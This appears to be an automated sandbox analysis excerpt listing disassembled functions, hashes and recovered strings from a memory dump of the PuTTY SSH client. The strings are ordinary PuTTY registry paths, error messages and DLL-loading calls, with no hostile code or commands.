                                                           • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: CursorMessageShow
                                                          • String ID: %s Error
                                                          • API String ID: 2689832819-1420171443
                                                          • Opcode ID: 529acfc0401a416d9ad773d000b4bc5090383dafba42528ccb05917a9b71ed95
                                                          • Instruction ID: b499014110443ce46f5f250cb4a3bf4ba5c68ac03355d6c630c9b9ebeda97db5
                                                          • Opcode Fuzzy Hash: 529acfc0401a416d9ad773d000b4bc5090383dafba42528ccb05917a9b71ed95
                                                          • Instruction Fuzzy Hash: 4E11BF62A0DA47A0FA40BB11F46067AE762AF847D4FC40131D88E07BA5DF7EE445E729
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                           • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: CursorMessageShow
                                                          • String ID: %s Fatal Error
                                                          • API String ID: 2689832819-656502033
                                                          • Opcode ID: d11445575b0614bf457e0b984e93601a16af451a85d6af8722bc36ad077a3d43
                                                          • Instruction ID: f3966094ef2c8c3a929f6e2c8bc4e77756cbd3b418d9bb75cb9a6460d4c0de25
                                                          • Opcode Fuzzy Hash: d11445575b0614bf457e0b984e93601a16af451a85d6af8722bc36ad077a3d43
                                                          • Instruction Fuzzy Hash: 4611C2A3E0954361F7517B22E8107B5D211AB587F5F840230CD5E073D5DE7EE885A329
                                                          APIs
                                                            • Part of subcall function 00007FF738A72CE0: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00007FF738A72DAD
                                                            • Part of subcall function 00007FF738A72CE0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00007FF738A72DF6
                                                            • Part of subcall function 00007FF738A730C0: RegSetValueExA.ADVAPI32 ref: 00007FF738A730F3
                                                          • RegCloseKey.ADVAPI32 ref: 00007FF738A6924D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                           • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Close$CreateValue
                                                          • String ID: %s@%d:$Software\SimonTatham\PuTTY\SshHostKeys
                                                          • API String ID: 1009429713-1135138915
                                                          • Opcode ID: 707bf62c00dda24b4c5b91d2722f252b90ec5e7e0c3ff9450992b339dfa031b0
                                                          • Instruction ID: b88f59f6bc9c20e670e208890b288659b74df19c768b3d32826ca4b4bd44dee9
                                                          • Opcode Fuzzy Hash: 707bf62c00dda24b4c5b91d2722f252b90ec5e7e0c3ff9450992b339dfa031b0
                                                          • Instruction Fuzzy Hash: 9E01A753B0A54661F911B6529801BF5D6006F55BD4F845130EE5D0B7D6ED3ED006A398
                                                          APIs
                                                          • ShowCursor.USER32(?,?,00000000,00000000,00007FF738A36323,?,?,00000000,?,00007FF738B3F302,00007FF738AA8570,?,?,?,?,00007FF738A6F6B8), ref: 00007FF738A37448
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                           • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: CursorShow
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/window.c$show
                                                          • API String ID: 3591285015-749648563
                                                          • Opcode ID: ef99cec585a03e5cf51621f00db0197eef3b6756505efe3f39d47df276865edc
                                                          • Instruction ID: fe0ec244000c149f24b06b5b8d90300137f39604a4f0e16a00fdca7128412097
                                                          • Opcode Fuzzy Hash: ef99cec585a03e5cf51621f00db0197eef3b6756505efe3f39d47df276865edc
                                                          • Instruction Fuzzy Hash: 9F018C27E0E29365FA51A7A4E4517B5CA851F05349FC80135C84E072D1CEAF684AB739
                                                          APIs
                                                          • MessageBoxA.USER32 ref: 00007FF738A3D44C
                                                            • Part of subcall function 00007FF738A36EF0: CoUninitialize.OLE32(00000000,00000000,00000000,?,00007FF738A3637F,?,?,00000000,?,00007FF738B3F302,00007FF738AA8570,?,?,?,?,00007FF738A6F6B8), ref: 00007FF738A36F21
                                                            • Part of subcall function 00007FF738A36EF0: DeleteObject.GDI32 ref: 00007FF738A36F9B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                           • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: DeleteMessageObjectUninitialize
                                                          • String ID: %s Internal Error$Unsupported protocol number found
                                                          • API String ID: 3083495962-184558026
                                                          • Opcode ID: 24a2c36de2cff0521ef03b6b679d54bb233ba35c2d43b8ca7c46796026308231
                                                          • Instruction ID: a4b57df89ad24b3c4e069b95c81d5e924c76ed90eae01fb89914f973fa1c5fba
                                                          • Opcode Fuzzy Hash: 24a2c36de2cff0521ef03b6b679d54bb233ba35c2d43b8ca7c46796026308231
                                                          • Instruction Fuzzy Hash: 14F06D62E0E603B1FE547761E461BB9D292AF04380FD40035C50D46BD6EE7FB946A27A
                                                          APIs
                                                            • Part of subcall function 00007FF738A72CE0: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00007FF738A72DAD
                                                            • Part of subcall function 00007FF738A72CE0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00007FF738A72DF6
                                                          • RegDeleteKeyA.ADVAPI32 ref: 00007FF738A68DCB
                                                          • RegCloseKey.ADVAPI32 ref: 00007FF738A68DDB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                           • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Close$CreateDelete
                                                          • String ID: Software\SimonTatham\PuTTY\Sessions
                                                          • API String ID: 3931322244-490553574
                                                          • Opcode ID: a4e5ef0fc4aef1ab74433ca8d47f6659cea662aab7a2e3982170b43526d1dfed
                                                          • Instruction ID: 8948445711dae5342b7847e196b65b7fa90c250509ca7cd4c116adbfc97c6722
                                                          • Opcode Fuzzy Hash: a4e5ef0fc4aef1ab74433ca8d47f6659cea662aab7a2e3982170b43526d1dfed
                                                          • Instruction Fuzzy Hash: ECF0F613F1F01250FD01B662B905BF9C2410F44BE4E840130ED1E0B7D6ED3EA046B268
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                           • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: DirectorySystem
                                                          • String ID: shell32.dll
                                                          • API String ID: 2188284642-3366042328
                                                          • Opcode ID: 4064919ca29c4320f69ecb9606d7b481c7873b1c8db2f445406ed758b7906284
                                                          • Instruction ID: 2bab603a8ae3c4467e35ca168ad161edf951aa3fb612d03f25f6aeffe592678f
                                                          • Opcode Fuzzy Hash: 4064919ca29c4320f69ecb9606d7b481c7873b1c8db2f445406ed758b7906284
                                                          • Instruction Fuzzy Hash: 63014C63E0D607A5FA10BB14B824765E790AB59784F804635C84D07764CF3EF889A76D
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                           • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmp
                                                           • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: CommErrorLast$StateTimeouts
                                                          • String ID: Configuring %s flow control
                                                          • API String ID: 274883806-3277764455
                                                          • Opcode ID: 3954c5f7d90f20679d8ed5bd0e48ac8b10462a58bff91b7b9b9d0e93ef08864b
                                                          • Instruction ID: 642a0c596a807be4089f3d7a61cd9607f595ca71bccb8c3c270893c7e7db6663
                                                          • Opcode Fuzzy Hash: 3954c5f7d90f20679d8ed5bd0e48ac8b10462a58bff91b7b9b9d0e93ef08864b
                                                          • Instruction Fuzzy Hash: 96F0F427E0D603A1FA21EB11D440579E310EF89B80FC08231DA4D06A88DE7EE681E724
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Event_set_error_mode
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/handle-io.c$h->type == HT_INPUT
                                                          • API String ID: 1844187620-2652805585
                                                          • Opcode ID: 5744f6e360a9956b53c12a30498589dfb877221bb7f80da0d79338a7506ed750
                                                          • Instruction ID: 09d2f116d5852eefb5183ee45c00cce0d1c2750553db7c802fe7252a4444f112
                                                          • Opcode Fuzzy Hash: 5744f6e360a9956b53c12a30498589dfb877221bb7f80da0d79338a7506ed750
                                                          • Instruction Fuzzy Hash: D5F0C253F0E443A2FB32A714E8447BAE7909F45795FC85031CA8D069C09E7FE480A329
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: CursorMessageShow
                                                          • String ID: %s Error
                                                          • API String ID: 2689832819-1420171443
                                                          • Opcode ID: a704828ae85002741c63dab488402cd9ba812a79143d62327dbbdfde6245da39
                                                          • Instruction ID: c304599d092ac33ca5973aa4fe58429a3e1f8fb98e18d668672953cab0b73390
                                                          • Opcode Fuzzy Hash: a704828ae85002741c63dab488402cd9ba812a79143d62327dbbdfde6245da39
                                                          • Instruction Fuzzy Hash: 76F0F662F0954365FB117B12E810775D612AF58BD8F840131CC0D07795CE7EA885E33A
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: PlacementWindow
                                                          • String ID: ,
                                                          • API String ID: 2154376794-3772416878
                                                          • Opcode ID: 1599f23c370a092ffdf6d629b96b88d901f2dd33717e64197277e8eac1224313
                                                          • Instruction ID: 54c18e18516b38cddd44463dff2e1cbae2f21be6ed2ea45edf95fdab0c397705
                                                          • Opcode Fuzzy Hash: 1599f23c370a092ffdf6d629b96b88d901f2dd33717e64197277e8eac1224313
                                                          • Instruction Fuzzy Hash: 29F0D6A390C283A5F750E720F454739F790EB44794F840230D48C06658DF7DD489DB15
                                                          APIs
                                                          Strings
                                                          • You are loading an SSH-2 private key which has an old version of the file format. This means your key file is not fully tamperproof. Future versions of %s may stop supporting this private key format, so we recommend you convert your key to the new format. You, xrefs: 00007FF738A53BAD
                                                          • %s Key File Warning, xrefs: 00007FF738A53BBF
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Message
                                                          • String ID: %s Key File Warning$You are loading an SSH-2 private key which has an old version of the file format. This means your key file is not fully tamperproof. Future versions of %s may stop supporting this private key format, so we recommend you convert your key to the new format. You
                                                          • API String ID: 2030045667-89788609
                                                          • Opcode ID: 77b961b021a589ef590278e8392d42d676c1bfc2c9bd2e428c83d01960df96f3
                                                          • Instruction ID: 544cdea95d728adca697d1626915665995cf41dfd32b26b360b55a98a6354c2a
                                                          • Opcode Fuzzy Hash: 77b961b021a589ef590278e8392d42d676c1bfc2c9bd2e428c83d01960df96f3
                                                          • Instruction Fuzzy Hash: 7BE0A012F0A45362FC00772269658BAD2026F55BE0BC05431DC0E1BB8AED3DA102A369
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: SetDefaultDllDirectories$kernel32.dll
                                                          • API String ID: 190572456-2102062458
                                                          • Opcode ID: 9830d294756c0564b70129235caa052b3906503412b90637ab17cb9ff3af1617
                                                          • Instruction ID: d970d47416d13d8ac71d414954e13c3d118edf028efb8ea30115061080eacce8
                                                          • Opcode Fuzzy Hash: 9830d294756c0564b70129235caa052b3906503412b90637ab17cb9ff3af1617
                                                          • Instruction Fuzzy Hash: 9EF0D052E0BB03A1FE95BB55D851770E290AF54300FD50539D50E02391EE3FA945B22D